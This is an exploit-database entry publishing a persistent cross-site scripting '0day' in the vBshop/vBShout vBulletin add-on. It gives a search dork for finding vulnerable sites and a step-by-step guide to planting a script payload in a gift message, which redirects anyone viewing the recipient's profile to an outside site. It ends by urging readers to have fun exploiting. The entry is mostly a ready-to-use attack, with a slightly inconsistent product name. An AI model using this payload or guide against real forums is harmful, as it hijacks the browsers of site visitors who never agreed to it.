vBshop persistent Persisstant XSS

2012-03-26T00:00:00
ID 1337DAY-ID-17832
Type zdt
Reporter ToiL
Modified 2012-03-26T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: vBshop persistent XSS 0day
# Google Dork: "DragonByte Technologies Ltd" vbshout
# Date: 25/3/2012 9:32 PM #EST
# Author: ToiL
# Software Link: http://www.dragonbyte-tech.com/
# Version: all
# Tested on: all
# CVE : XSS
 
#Greeting from Team Odyessy.
#Today we will release a 0day for the vBulletin mod, vBShout.
#This 0day exploit is brought to you by
www.Bugabuse.net/<http://www.bugabuse.net/>
#Have fun, And happy exploiting.
 
######Guide########
 
 
Go to vBshop
Gift an item to aother user.
In the 'message to user' put:
<script>top.location='https://www.bugabuse.net/';</script>
Send the item off.
Go to the users profile that you gifted
Boom. Pers. XSS.
Edit to your likeing.



#  0day.today [2018-01-04]  #